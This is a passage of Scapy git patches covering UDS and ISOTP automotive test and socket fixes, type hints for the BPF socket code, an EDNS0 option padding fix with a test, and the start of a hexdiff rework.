a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -276,8 +276,13 @@ resps = [EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="subFunctionNotSup es = [UDS_ServiceEnumerator] +debug_dissector_backup = conf.debug_dissector + +# This Enumerator is sending corrupted Packets, therefore we need to disable the debug_dissector +conf.debug_dissector = False scanner = executeScannerInVirtualEnvironment( resps, es, UDS_ServiceEnumerator_kwargs={"request_length": 3}, unstable_socket=False) +conf.debug_dissector = debug_dissector_backup assert scanner.scan_completed assert scanner.progress() > 0.95 diff --git a/test/contrib/automotive/uds.uts b/test/contrib/automotive/uds.uts index 8a05bf4ac34..2c58d781e32 100644 --- a/test/contrib/automotive/uds.uts +++ b/test/contrib/automotive/uds.uts @@ -1100,9 +1100,7 @@ assert rdtci.DTCStatusMask == 0xff rdtci = UDS(b'\x19\x03\xff\xee\xdd\xaa') assert rdtci.service == 0x19 assert rdtci.reportType == 0x03 -assert rdtci.DTCHighByte == 0xff -assert rdtci.DTCMiddleByte == 0xee -assert rdtci.DTCLowByte == 0xdd +assert rdtci.dtc == DTC(bytes.fromhex("ffeedd")) assert rdtci.DTCSnapshotRecordNumber == 0xaa = Check UDS_RDTCI @@ -1110,9 +1108,7 @@ assert rdtci.DTCSnapshotRecordNumber == 0xaa rdtci = UDS(b'\x19\x04\xff\xee\xdd\xaa') assert rdtci.service == 0x19 assert rdtci.reportType == 0x04 -assert rdtci.DTCHighByte == 0xff -assert rdtci.DTCMiddleByte == 0xee -assert rdtci.DTCLowByte == 0xdd +assert rdtci.dtc == DTC(bytes.fromhex("ffeedd")) assert rdtci.DTCSnapshotRecordNumber == 0xaa = Check UDS_RDTCI @@ -1127,9 +1123,7 @@ assert rdtci.DTCSnapshotRecordNumber == 0xaa rdtci = UDS(b'\x19\x06\xff\xee\xdd\xaa') assert rdtci.service == 0x19 assert rdtci.reportType == 0x06 -assert rdtci.DTCHighByte == 0xff -assert rdtci.DTCMiddleByte == 0xee -assert rdtci.DTCLowByte == 0xdd +assert rdtci.dtc == DTC(bytes.fromhex("ffeedd")) assert rdtci.DTCExtendedDataRecordNumber == 0xaa = Check UDS_RDTCI @@ -1153,18 +1147,14 @@ assert rdtci.DTCStatusMask == 0xbb rdtci = UDS(b'\x19\x09\xff\xee\xdd') assert rdtci.service == 0x19 assert rdtci.reportType == 0x09 -assert rdtci.DTCHighByte == 0xff -assert rdtci.DTCMiddleByte == 0xee -assert rdtci.DTCLowByte == 0xdd +assert rdtci.dtc == DTC(bytes.fromhex("ffeedd")) = Check UDS_RDTCI rdtci = UDS(b'\x19\x10\xff\xee\xdd\xaa') assert rdtci.service == 0x19 assert rdtci.reportType == 0x10 -assert rdtci.DTCHighByte == 0xff -assert rdtci.DTCMiddleByte == 0xee -assert rdtci.DTCLowByte == 0xdd +assert rdtci.dtc == DTC(bytes.fromhex("ffeedd")) assert rdtci.DTCExtendedDataRecordNumber == 0xaa @@ -1190,6 +1180,23 @@ assert rdtcipr.service == 0x59 assert rdtcipr.reportType == 3 assert rdtcipr.dataRecord == b'\xff\xee\xdd\xaa' + += Check UDS_RDTCIPR 2 +req = UDS(bytes.fromhex("1904480a46ff")) +resp = UDS(bytes.fromhex("5904480a46af000b170002ff6417010a8278fa170c2ff1800000800104800200028003400a8004808005054002400a400004010b170002ff6417010a82ec69170c2f2c800000800100800200028003400a80048080050540024017400004")) + +assert resp.answers(req) + +req = UDS(bytes.fromhex("1904480a47ff")) +resp = UDS(bytes.fromhex("5904480a46af000b170002ff6417010a8278fa170c2ff1800000800104800200028003400a8004808005054002400a400004010b170002ff6417010a82ec69170c2f2c800000800100800200028003400a80048080050540024017400004")) + +assert not resp.answers(req) + +req = UDS(bytes.fromhex("1906480a46ff")) +resp = UDS(bytes.fromhex("5906480a46af010002070328")) + +assert resp.answers(req) + = Check UDS_RC rc = UDS(b'\x31\x03\xff\xee\xdd\xaa') From 5a2dbf08d76367ef8c392c9ff9c62674c9732d2f Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 24 Nov 2023 13:22:23 +0100 Subject: [PATCH 1144/1632] Add additional errno handling to ISOTPNativeSocket to prevent accidental close (#4193) --- scapy/contrib/isotp/isotp_native_socket.py | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/scapy/contrib/isotp/isotp_native_socket.py b/scapy/contrib/isotp/isotp_native_socket.py index 34a77cb84aa..7718365c954 100644 --- a/scapy/contrib/isotp/isotp_native_socket.py +++ b/scapy/contrib/isotp/isotp_native_socket.py @@ -380,7 +380,13 @@ def recv_raw(self, x=0xffff): "Increasing `stmin` could solve this problem.") elif e.errno == 110: log_isotp.warning('Captured no data, socket read timed out.') + elif e.errno == 70: + log_isotp.warning( + 'Communication error on send. ' + 'TX path flowcontrol reception timeout.') else: + log_isotp.error( + 'Unknown error code received %d. Closing socket!', e.errno) self.close() return None, None, None From 3eee39e1b13f90ac256038d693b5f70d8647c9f2 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 28 Nov 2023 22:10:38 +0100 Subject: [PATCH 1145/1632] Type hint arch/bpf (#3825) * Type hint arch/bpf * Enable mypy for more libs --- .config/mypy/mypy_enabled.txt | 11 ++- scapy/arch/bpf/consts.py | 17 +++-- scapy/arch/bpf/core.py | 32 ++++++-- scapy/arch/bpf/supersocket.py | 135 +++++++++++++++++++++------------- scapy/arch/linux.py | 13 ++-- test/bpf.uts | 3 +- 6 files changed, 141 insertions(+), 70 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 6238db12561..076316559bc 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -10,11 +10,15 @@ scapy/__main__.py scapy/all.py scapy/ansmachine.py scapy/arch/__init__.py +scapy/arch/bpf/__init__.py +scapy/arch/bpf/consts.py +scapy/arch/bpf/core.py +scapy/arch/bpf/supersocket.py scapy/arch/common.py scapy/arch/libpcap.py scapy/arch/linux.py -scapy/arch/unix.py scapy/arch/solaris.py +scapy/arch/unix.py scapy/arch/windows/__init__.py scapy/arch/windows/native.py scapy/arch/windows/structures.py @@ -87,7 +91,12 @@ scapy/contrib/roce.py scapy/contrib/tcpao.py # LIBS +scapy/libs/__init__.py +scapy/libs/ethertypes.py scapy/libs/extcap.py +scapy/libs/matplot.py +scapy/libs/structures.py +scapy/libs/test_pyx.py # TEST test/testsocket.py diff --git a/scapy/arch/bpf/consts.py b/scapy/arch/bpf/consts.py index 3ea84277496..df207a3397f 100644 --- a/scapy/arch/bpf/consts.py +++ b/scapy/arch/bpf/consts.py @@ -12,6 +12,12 @@ from scapy.libs.structures import bpf_program from scapy.data import MTU +# Type hints +from typing import ( + Any, + Callable, +) + SIOCGIFFLAGS = 0xc0206911 BPF_BUFFER_LENGTH = MTU @@ -23,19 +29,20 @@ IOC_IN = 0x80000000 IOC_INOUT = IOC_IN | IOC_OUT -_th = lambda x: x if isinstance(x, int) else ctypes.sizeof(x) +_th = lambda x: x if isinstance(x, int) else ctypes.sizeof(x) # type: Callable[[Any], int] # noqa: E501 def _IOC(inout, group, num, len): + # type: (int, str, int, Any) -> int return (inout | ((_th(len) & IOCPARM_MASK) << 16) | (ord(group) << 8) | (num)) -_IO = lambda g, n: _IOC(IOC_VOID, g, n, 0) -_IOR = lambda g, n, t: _IOC(IOC_OUT, g, n, t) -_IOW = lambda g, n, t: _IOC(IOC_IN, g, n, t) -_IOWR = lambda g, n, t: _IOC(IOC_INOUT, g, n, t) +_IO = lambda g, n: _IOC(IOC_VOID, g, n, 0) # type: Callable[[str, int], int] +_IOR = lambda g, n, t: _IOC(IOC_OUT, g, n, t) # type: Callable[[str, int, Any], int] +_IOW = lambda g, n, t: _IOC(IOC_IN, g, n, t) # type: Callable[[str, int, Any], int] +_IOWR = lambda g, n, t: _IOC(IOC_INOUT, g, n, t) # type: Callable[[str, int, Any], int] # Length of some structures _bpf_stat = 8 diff --git a/scapy/arch/bpf/core.py b/scapy/arch/bpf/core.py index 76eb7796cef..b7c31ff8807 100644 --- a/scapy/arch/bpf/core.py +++ b/scapy/arch/bpf/core.py @@ -31,9 +31,18 @@ InterfaceProvider, NetworkInterface, network_name, + _GlobInterfaceType, ) from scapy.pton_ntop import inet_ntop +# Typing +from typing import ( + Dict, + List, + Optional, + Tuple, +) + if LINUX: raise OSError("BPF conflicts with Linux") @@ -67,7 +76,10 @@ class if_nameindex(Structure): def get_if_raw_addr(ifname): - """Returns the IPv4 address configured on 'ifname', packed with inet_pton.""" # noqa: E501 + # type: (_GlobInterfaceType) -> bytes + """ + Returns the IPv4 address configured on 'ifname', packed with inet_pton. + """ ifname = network_name(ifname) @@ -99,6 +111,7 @@ def get_if_raw_addr(ifname): def get_if_raw_hwaddr(ifname): + # type: (_GlobInterfaceType) -> Tuple[int, bytes] """Returns the packed MAC address configured on 'ifname'.""" NULL_MAC_ADDRESS = b'\x00' * 6 @@ -128,19 +141,19 @@ def get_if_raw_hwaddr(ifname): raise Scapy_Exception("No MAC address found on %s !" % ifname) # Pack and return the MAC address - mac = addresses[0].split(' ')[1] - mac = [chr(int(b, 16)) for b in mac.split(':')] + mac = [int(b, 16) for b in addresses[0].split(' ')[1].split(':')] # Check that the address length is correct if len(mac) != 6: raise Scapy_Exception("No MAC address found on %s !" % ifname) - return (ARPHDR_ETHER, ''.join(mac)) + return (ARPHDR_ETHER, struct.pack("!BBBBBB", *mac)) # BPF specific functions def get_dev_bpf(): + # type: () -> Tuple[int, int] """Returns an opened BPF file object""" # Get the first available BPF handle @@ -160,6 +173,7 @@ def get_dev_bpf(): def attach_filter(fd, bpf_filter, iface): + # type: (int, str, _GlobInterfaceType) -> None """Attach a BPF filter to the BPF file descriptor""" bp = compile_filter(bpf_filter, iface) # Assign the BPF program to the interface @@ -171,6 +185,7 @@ def attach_filter(fd, bpf_filter, iface): # Interface manipulation functions def _get_ifindex_list(): + # type: () -> List[Tuple[str, int]] """ Returns a list containing (iface, index) """ @@ -189,6 +204,7 @@ def _get_ifindex_list(): def _get_if_flags(ifname): + # type: (_GlobInterfaceType) -> Optional[int] """Internal function to get interface flags""" # Get interface flags try: @@ -206,6 +222,7 @@ class BPFInterfaceProvider(InterfaceProvider): name = "BPF" def _is_valid(self, dev): + # type: (NetworkInterface) -> bool if not dev.flags & 0x1: # not IFF_UP return False # Get a BPF handle @@ -228,17 +245,20 @@ def _is_valid(self, dev): os.close(fd) def load(self): + # type: () -> Dict[str, NetworkInterface] from scapy.fields import FlagValue data = {} ips = in6_getifaddr() for ifname, index in _get_ifindex_list(): try: - ifflags = _get_if_flags(ifname) + ifflags_int = _get_if_flags(ifname) + if ifflags_int is None: + continue mac = scapy.utils.str2mac(get_if_raw_hwaddr(ifname)[1]) ip = inet_ntop(socket.AF_INET, get_if_raw_addr(ifname)) except Scapy_Exception: continue - ifflags = FlagValue(ifflags, _iff_flags) + ifflags = FlagValue(ifflags_int, _iff_flags) if_data = { "name": ifname, "network_name": ifname, diff --git a/scapy/arch/bpf/supersocket.py b/scapy/arch/bpf/supersocket.py index 3e57a64d1b0..06a6dbc9012 100644 --- a/scapy/arch/bpf/supersocket.py +++ b/scapy/arch/bpf/supersocket.py @@ -8,6 +8,8 @@ """ from select import select + +import abc import ctypes import errno import fcntl @@ -36,10 +38,22 @@ from scapy.consts import DARWIN, FREEBSD, NETBSD from scapy.data import ETH_P_ALL, DLT_IEEE802_11_RADIO from scapy.error import Scapy_Exception, warning -from scapy.interfaces import network_name +from scapy.interfaces import network_name, _GlobInterfaceType from scapy.supersocket import SuperSocket from scapy.compat import raw +# Typing +from typing import ( + Any, + List, + Optional, + Tuple, + Type, + TYPE_CHECKING, +) +if TYPE_CHECKING: + from scapy.packet import Packet + # Structures & c types if FREEBSD or NETBSD: @@ -61,7 +75,7 @@ class bpf_timeval(ctypes.Structure): _fields_ = [("tv_sec", ctypes.c_ulong), ("tv_usec", ctypes.c_ulong)] else: - class bpf_timeval(ctypes.Structure): + class bpf_timeval(ctypes.Structure): # type: ignore _fields_ = [("tv_sec", ctypes.c_uint32), ("tv_usec", ctypes.c_uint32)] @@ -81,19 +95,26 @@ class bpf_hdr(ctypes.Structure): class _L2bpfSocket(SuperSocket): """"Generic Scapy BPF Super Socket""" + __slots__ = ["bpf_fd"] desc = "read/write packets using BPF" nonblocking_socket = True - def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, - nofilter=0, monitor=False): + def __init__(self, + iface=None, # type: Optional[_GlobInterfaceType] + type=ETH_P_ALL, # type: int + promisc=None, # type: Optional[bool] + filter=None, # type: Optional[str] + nofilter=0, # type: int + monitor=False, # type: bool + ): if monitor: raise Scapy_Exception( "We do not natively support monitor mode on BPF. " "Please turn on libpcap using conf.use_pcap = True" ) - self.fd_flags = None + self.fd_flags = None # type: Optional[int] self.assigned_interface = None # SuperSocket mandatory variables @@ -104,15 +125,13 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, self.iface = network_name(iface or conf.iface) # Get the BPF handle - self.ins = None - (self.ins, self.dev_bpf) = get_dev_bpf() - self.outs = self.ins + self.bpf_fd, self.dev_bpf = get_dev_bpf() if FREEBSD: # Set the BPF timeval format. Availability issues here ! try: fcntl.ioctl( - self.ins, BIOCSTSTAMP, + self.bpf_fd, BIOCSTSTAMP, struct.pack('I', BPF_T_NANOTIME) ) except IOError: @@ -121,7 +140,7 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, # Set the BPF buffer length try: fcntl.ioctl( - self.ins, BIOCSBLEN, + self.bpf_fd, BIOCSBLEN, struct.pack('I', BPF_BUFFER_LENGTH) ) except IOError: @@ -131,7 +150,7 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, # Assign the network interface to the BPF handle try: fcntl.ioctl( - self.ins, BIOCSETIF, + self.bpf_fd, BIOCSETIF, struct.pack("16s16x", self.iface.encode()) ) except IOError: @@ -140,7 +159,7 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, # Set the interface into promiscuous if self.promisc: - self.set_promisc(1) + self.set_promisc(True) # Set the interface to monitor mode # Note: - trick from libpcap/pcap-bpf.c - monitor_mode() @@ -160,7 +179,7 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, if macos_version < 101500: dlt_radiotap = struct.pack('I', DLT_IEEE802_11_RADIO) try: - fcntl.ioctl(self.ins, BIOCSDLT, dlt_radiotap) + fcntl.ioctl(self.bpf_fd, BIOCSDLT, dlt_radiotap) except IOError: raise Scapy_Exception("Can't set %s into monitor mode!" % self.iface) @@ -170,7 +189,7 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, # Don't block on read try: - fcntl.ioctl(self.ins, BIOCIMMEDIATE, struct.pack('I', 1)) + fcntl.ioctl(self.bpf_fd, BIOCIMMEDIATE, struct.pack('I', 1)) except IOError: raise Scapy_Exception("BIOCIMMEDIATE failed on /dev/bpf%i" % self.dev_bpf) @@ -178,7 +197,7 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, # Scapy will provide the link layer source address # Otherwise, it is written by the kernel try: - fcntl.ioctl(self.ins, BIOCSHDRCMPLT, struct.pack('i', 1)) + fcntl.ioctl(self.bpf_fd, BIOCSHDRCMPLT, struct.pack('i', 1)) except IOError: raise Scapy_Exception("BIOCSHDRCMPLT failed on /dev/bpf%i" % self.dev_bpf) @@ -193,7 +212,7 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, filter = "not (%s)" % conf.except_filter if filter is not None: try: - attach_filter(self.ins, filter, self.iface) + attach_filter(self.bpf_fd, filter, self.iface) filter_attached = True except ImportError as ex: warning("Cannot set filter: %s" % ex) @@ -204,7 +223,7 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, # more than ensuring the length frame is not null. filter = "greater 0" try: - attach_filter(self.ins, filter, self.iface) + attach_filter(self.bpf_fd, filter, self.iface) except ImportError as ex: warning("Cannot set filter: %s" % ex) @@ -212,15 +231,17 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, self.guessed_cls = self.guess_cls() def set_promisc(self, value): + # type: (bool) -> None """Set the interface in promiscuous mode""" try: - fcntl.ioctl(self.ins, BIOCPROMISC, struct.pack('i', value)) + fcntl.ioctl(self.bpf_fd, BIOCPROMISC, struct.pack('i', value)) except IOError: raise Scapy_Exception("Cannot set promiscuous mode on interface " "(%s)!" % self.iface) def __del__(self): + # type: () -> None """Close the file descriptor on delete""" # When the socket is deleted on Scapy exits, __del__ is # sometimes called "too late", and self is None @@ -228,12 +249,13 @@ def __del__(self): self.close() def guess_cls(self): + # type: () -> type """Guess the packet class that must be used on the interface""" # Get the data link type try: - ret = fcntl.ioctl(self.ins, BIOCGDLT, struct.pack('I', 0)) - ret = struct.unpack('I', ret)[0] + ret = fcntl.ioctl(self.bpf_fd, BIOCGDLT, struct.pack('I', 0)) + linktype = struct.unpack('I', ret)[0] except IOError: cls = conf.default_l2 warning("BIOCGDLT failed: unable to guess type. Using %s !", @@ -242,18 +264,20 @@ def guess_cls(self): # Retrieve the corresponding class try: - return conf.l2types[ret] + return conf.l2types.num2layer[linktype] except KeyError: cls = conf.default_l2 - warning("Unable to guess type (type %i). Using %s", ret, cls.name) + warning("Unable to guess type (type %i). Using %s", linktype, cls.name) + return cls def set_nonblock(self, set_flag=True): + # type: (bool) -> None """Set the non blocking flag on the socket""" # Get the current flags if self.fd_flags is None: try: - self.fd_flags = fcntl.fcntl(self.ins, fcntl.F_GETFL) + self.fd_flags = fcntl.fcntl(self.bpf_fd, fcntl.F_GETFL) except IOError: warning("Cannot get flags on this file descriptor !") return @@ -265,50 +289,58 @@ def set_nonblock(self, set_flag=True): new_fd_flags = self.fd_flags & ~os.O_NONBLOCK try: - fcntl.fcntl(self.ins, fcntl.F_SETFL, new_fd_flags) + fcntl.fcntl(self.bpf_fd, fcntl.F_SETFL, new_fd_flags) self.fd_flags = new_fd_flags except Exception: warning("Can't set flags on this file descriptor !") def get_stats(self): + # type: () -> Tuple[Optional[int], Optional[int]] """Get received / dropped statistics""" try: - ret = fcntl.ioctl(self.ins, BIOCGSTATS, struct.pack("2I", 0, 0)) + ret = fcntl.ioctl(self.bpf_fd, BIOCGSTATS, struct.pack("2I", 0, 0)) return struct.unpack("2I", ret) except IOError: warning("Unable to get stats from BPF !") return (None, None) def get_blen(self): + # type: () -> Optional[int] """Get the BPF buffer length""" try: - ret = fcntl.ioctl(self.ins, BIOCGBLEN, struct.pack("I", 0)) - return struct.unpack("I", ret)[0] + ret = fcntl.ioctl(self.bpf_fd, BIOCGBLEN, struct.pack("I", 0)) + return struct.unpack("I", ret)[0] # type: ignore except IOError: warning("Unable to get the BPF buffer length") - return + return None def fileno(self): + # type: () -> int """Get the underlying file descriptor""" - return self.ins + return self.bpf_fd def close(self): + # type: () -> None """Close the Super Socket""" - if not self.closed and self.ins is not None: - os.close(self.ins) + if not self.closed and self.bpf_fd != -1: + os.close(self.bpf_fd) self.closed = True - self.ins = None + self.bpf_fd = -1 + @abc.abstractmethod def send(self, x): + # type: (Packet) -> int """Dummy send method""" raise Exception( "Can't send anything with %s" % self.__class__.__name__ ) + @abc.abstractmethod def recv_raw(self, x=BPF_BUFFER_LENGTH): + # type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] # noqa: E501 """Dummy recv method""" raise Exception( "Can't recv anything with %s" % self.__class__.__name__ @@ -316,6 +348,7 @@ def recv_raw(self, x=BPF_BUFFER_LENGTH): @staticmethod def select(sockets, remain=None): + # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] """This function is called during sendrecv() routine to select the available sockets. """ @@ -327,14 +360,17 @@ class L2bpfListenSocket(_L2bpfSocket): """"Scapy L2 BPF Listen Super Socket""" def __init__(self, *args, **kwargs): - self.received_frames = [] + # type: (*Any, **Any) -> None + self.received_frames = [] # type: List[Tuple[Optional[type], Optional[bytes], Optional[float]]] # noqa: E501 super(L2bpfListenSocket, self).__init__(*args, **kwargs) def buffered_frames(self): + # type: () -> int """Return the number of frames in the buffer""" return len(self.received_frames) def get_frame(self): + # type: () -> Tuple[Optional[type], Optional[bytes], Optional[float]] """Get a frame or packet from the received list""" if self.received_frames: return self.received_frames.pop(0) @@ -343,12 +379,14 @@ def get_frame(self): @staticmethod def bpf_align(bh_h, bh_c): + # type: (int, int) -> int """Return the index to the end of the current packet""" # from return ((bh_h + bh_c) + (BPF_ALIGNMENT - 1)) & ~(BPF_ALIGNMENT - 1) def extract_frames(self, bpf_buffer): + # type: (bytes) -> None """ Extract all frames from the buffer and stored them in the received list """ @@ -381,6 +419,7 @@ def extract_frames(self, bpf_buffer): self.extract_frames(bpf_buffer[end:]) def recv_raw(self, x=BPF_BUFFER_LENGTH): + # type: (int) -> Tuple[Optional[type], Optional[bytes], Optional[float]] """Receive a frame from the network""" x = min(x, BPF_BUFFER_LENGTH) @@ -391,7 +430,7 @@ def recv_raw(self, x=BPF_BUFFER_LENGTH): # Get data from BPF try: - bpf_buffer = os.read(self.ins, x) + bpf_buffer = os.read(self.bpf_fd, x) except EnvironmentError as exc: if exc.errno != errno.EAGAIN: warning("BPF recv_raw()", exc_info=True) @@ -406,10 +445,12 @@ class L2bpfSocket(L2bpfListenSocket): """"Scapy L2 BPF Super Socket""" def send(self, x): + # type: (Packet) -> int """Send a frame""" - return os.write(self.outs, raw(x)) + return os.write(self.bpf_fd, raw(x)) def nonblock_recv(self): + # type: () -> Optional[Packet] """Non blocking receive""" if self.buffered_frames(): @@ -425,7 +466,7 @@ def nonblock_recv(self): class L3bpfSocket(L2bpfSocket): - def recv(self, x=BPF_BUFFER_LENGTH, **kwargs): + def recv(self, x: int = BPF_BUFFER_LENGTH, **kwargs: Any) -> Optional['Packet']: """Receive on layer 3""" r = SuperSocket.recv(self, x, **kwargs) if r: @@ -434,6 +475,7 @@ def recv(self, x=BPF_BUFFER_LENGTH, **kwargs): return r def send(self, pkt): + # type: (Packet) -> int """Send a packet""" from scapy.layers.l2 import Loopback @@ -445,7 +487,7 @@ def send(self, pkt): # Assign the network interface to the BPF handle if self.assigned_interface != iff: try: - fcntl.ioctl(self.outs, BIOCSETIF, struct.pack("16s16x", iff.encode())) # noqa: E501 + fcntl.ioctl(self.bpf_fd, BIOCSETIF, struct.pack("16s16x", iff.encode())) # noqa: E501 except IOError: raise Scapy_Exception("BIOCSETIF failed on %s" % iff) self.assigned_interface = iff @@ -476,7 +518,7 @@ def send(self, pkt): # the problem will eventually go away. They already don't work on Macs # with Apple Silicon (M1). if DARWIN and iff.startswith('tun') and self.guessed_cls == Loopback: - frame = raw(pkt) + frame = pkt elif FREEBSD and (iff.startswith('tun') or iff.startswith('tap')): # On FreeBSD, the bpf manpage states that it is only possible # to write packets to Ethernet and SLIP network interfaces @@ -487,36 +529,29 @@ def send(self, pkt): warning("Cannot write to %s according to the documentation!", iff) return else: - frame = raw(self.guessed_cls() / pkt) + frame = self.guessed_cls() / pkt pkt.sent_time = time.time() # Send the frame - L2bpfSocket.send(self, frame) + return L2bpfSocket.send(self, frame) # Sockets manipulation functions -def isBPFSocket(obj): - """Return True is obj is a BPF Super Socket""" - return isinstance( - obj, - (L2bpfListenSocket, L2bpfListenSocket, L3bpfSocket) - ) - - def bpf_select(fds_list, timeout=None): + # type: (List[SuperSocket], Optional[float]) -> List[SuperSocket] """A call to recv() can return several frames. This functions hides the fact that some frames are read from the internal buffer.""" # Check file descriptors types - bpf_scks_buffered = list() + bpf_scks_buffered = list() # type: List[SuperSocket] select_fds = list() for tmp_fd in fds_list: # Specific BPF sockets: get buffers status - if isBPFSocket(tmp_fd) and tmp_fd.buffered_frames(): + if isinstance(tmp_fd, L2bpfListenSocket) and tmp_fd.buffered_frames(): bpf_scks_buffered.append(tmp_fd) continue diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index 58100e5479a..b79cda1315e 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -44,6 +44,7 @@ InterfaceProvider, NetworkInterface, network_name, + _GlobInterfaceType, ) from scapy.libs.structures import sock_fprog from scapy.packet import Packet, Padding @@ -121,7 +122,7 @@ def get_if_raw_addr(iff): - # type: (Union[NetworkInterface, str]) -> bytes + # type: (_GlobInterfaceType) -> bytes r""" Return the raw IPv4 address of an interface. If unavailable, returns b"\0\0\0\0" @@ -147,7 +148,7 @@ def _get_if_list(): def attach_filter(sock, bpf_filter, iface): - # type: (socket.socket, str, Union[NetworkInterface, str]) -> None + # type: (socket.socket, str, _GlobInterfaceType) -> None """ Compile bpf filter and attach it to a socket @@ -159,17 +160,17 @@ def attach_filter(sock, bpf_filter, iface): if conf.use_pypy and sys.pypy_version_info <= (7, 3, 2): # type: ignore # PyPy < 7.3.2 has a broken behavior # https://foss.heptapod.net/pypy/pypy/-/issues/3298 - bp = struct.pack( + bp = struct.pack( # type: ignore 'HL', bp.bf_len, ctypes.addressof(bp.bf_insns.contents) ) else: - bp = sock_fprog(bp.bf_len, bp.bf_insns) + bp = sock_fprog(bp.bf_len, bp.bf_insns) # type: ignore sock.setsockopt(socket.SOL_SOCKET, SO_ATTACH_FILTER, bp) def set_promisc(s, iff, val=1): - # type: (socket.socket, Union[NetworkInterface, str], int) -> None + # type: (socket.socket, _GlobInterfaceType, int) -> None mreq = struct.pack("IHH8s", get_if_index(iff), PACKET_MR_PROMISC, 0, b"") if val: cmd = PACKET_ADD_MEMBERSHIP @@ -407,7 +408,7 @@ def proc2r(p): def get_if_index(iff): - # type: (Union[NetworkInterface, str]) -> int + # type: (_GlobInterfaceType) -> int return int(struct.unpack("I", get_if(iff, SIOCGIFINDEX)[16:20])[0]) diff --git a/test/bpf.uts b/test/bpf.uts index fa4db648f5d..13bfb1e2bfb 100644 --- a/test/bpf.uts +++ b/test/bpf.uts @@ -50,8 +50,7 @@ len(iflist) > 0 = Misc functions ~ needs_root -from scapy.arch.bpf.supersocket import isBPFSocket, bpf_select -isBPFSocket(L2bpfListenSocket()) and isBPFSocket(L2bpfSocket()) and isBPFSocket(L3bpfSocket()) +from scapy.arch.bpf.supersocket import bpf_select l = bpf_select([L2bpfSocket()]) l = bpf_select([L2bpfSocket(), sys.stdin.fileno()]) From cb6dcf47f81bc2377b97c9d4fe96c8d4aced9c85 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sat, 2 Dec 2023 00:33:56 +0000 Subject: [PATCH 1146/1632] DNS: tweak extract_padding in EDNS(0) options Without this patch EDNS0ClientSubnet and EDNS0ExtendedDNSError consume all the bytes (including all the options following them): ```sh >>> DNSRROPT(raw(DNSRROPT(rdata=[EDNS0ExtendedDNSError(), EDNS0TLV()]))).rdata [>] ``` With this patch applied the options are fully split: ```sh >>> DNSRROPT(raw(DNSRROPT(rdata=[EDNS0ExtendedDNSError(), EDNS0TLV()]))).rdata [, ] ``` --- scapy/layers/dns.py | 6 ++++++ test/scapy/layers/dns_edns0.uts | 4 ++++ 2 files changed, 10 insertions(+) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 94cf6d78144..ec1f9d8d3c3 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -510,6 +510,9 @@ class EDNS0ClientSubnet(Packet): ClientSubnetv4("address", "192.168.0.0", length_from=lambda p: p.source_plen))] + def extract_padding(self, p): + return "", p + # RFC 8914 - Extended DNS Errors @@ -558,6 +561,9 @@ class EDNS0ExtendedDNSError(Packet): StrLenField("extra_text", "", length_from=lambda pkt: pkt.optlen - 2)] + def extract_padding(self, p): + return "", p + # RFC 4034 - Resource Records for the DNS Security Extensions diff --git a/test/scapy/layers/dns_edns0.uts b/test/scapy/layers/dns_edns0.uts index bd186694afa..02385d845e0 100644 --- a/test/scapy/layers/dns_edns0.uts +++ b/test/scapy/layers/dns_edns0.uts @@ -119,3 +119,7 @@ rropt = DNSRROPT(b'\x00\x00)\x04\xd0\x00\x00\x00\x00\x001\x00\x0f\x00-\x00\x06pr assert len(rropt.rdata) == 1 p = rropt.rdata[0] assert p.info_code == 6 and p.optlen == 45 and p.extra_text == b'proof of non-existence of example.com. NSEC' + +p = DNSRROPT(raw(DNSRROPT(rdata=[EDNS0ExtendedDNSError(), EDNS0ClientSubnet(), EDNS0TLV()]))) +assert len(p.rdata) == 3 +assert all(Raw not in opt for opt in p.rdata) From e80b3d4457a30c361beb31e53e416cddb5bbbbb4 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 26 Nov 2023 15:35:44 +0000 Subject: [PATCH 1147/1632] hexdiff: 2 algorithms, doc --- scapy/utils.py | 128 +++++++++++++++++++++++++++++++++----------- test/regression.uts | 10 ++-- 2 files changed, 102 insertions(+), 36 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index 1906390f18c..5720ed90e10 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -44,7 +44,12 @@ hex_bytes, bytes_encode, ) -from scapy.error import log_runtime, Scapy_Exception, warning +from scapy.error import ( + log_interactive, + log_runtime, + Scapy_Exception, + warning, +) from scapy.pton_ntop import inet_pton # Typing imports @@ -392,50 +397,111 @@ def repr_hex(s): @conf.commands.register -def hexdiff(a, b, autojunk=False): - # type: (Union[Packet, AnyStr], Union[Packet, AnyStr], bool) -> None +def hexdiff( + a: Union['Packet', AnyStr], + b: Union['Packet', AnyStr], + algo: Optional[str] = None, + autojunk: bool = False, +) -> None: """ Show differences between 2 binary strings, Packets... - For the autojunk parameter, see - 